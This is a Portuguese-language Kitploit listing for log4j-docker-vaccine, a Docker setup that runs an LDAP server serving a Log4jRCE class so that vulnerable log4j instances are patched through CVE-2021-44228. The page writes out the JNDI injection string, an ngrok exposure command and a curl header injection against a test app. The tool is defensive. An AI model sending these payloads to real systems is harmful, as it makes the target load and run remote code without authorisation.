Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j-docker-vaccine — solução docker compose para executar um ambiente de vacinação para a vulnerabilidade log4j2 CVE-2021-44228 | Kitploit
Ferramentas/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

solução docker compose para executar um ambiente de vacinação para a vulnerabilidade log4j2 CVE-2021-44228

Ver Repositório
2há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vacina Docker Log4j

Uma forma containerizada de executar a vacina log4j oferecida pela Cyberreason

  • https://github.com/Cybereason/Logout4Shell

Faça funcionar

Clone este repositório:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Edite o arquivo containers.env para conter um IP/DNS privado ou público preciso que seu alvo possa acessar. A entrada padrão provavelmente não funcionará para você!

Construa e execute os containers:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Agora você tem um servidor ldap em escuta que servirá a classe Log4jRCE para inocular uma instância vulnerável do log4j.

Você pode expor isso à internet (se desejar) usando o ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Você pode enviar uma instância vulnerável do log4j para isso usando a infame string de entrada jndi:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Testando

Há uma versão propositalmente vulnerável do log4j em um contêiner disponível em:

  • https://github.com/christophetd/log4shell-vulnerable-app

Você pode seguir as instruções deles para iniciá-lo e usá-lo para teste:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

E dispare a inoculação via:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Baixar ferramenta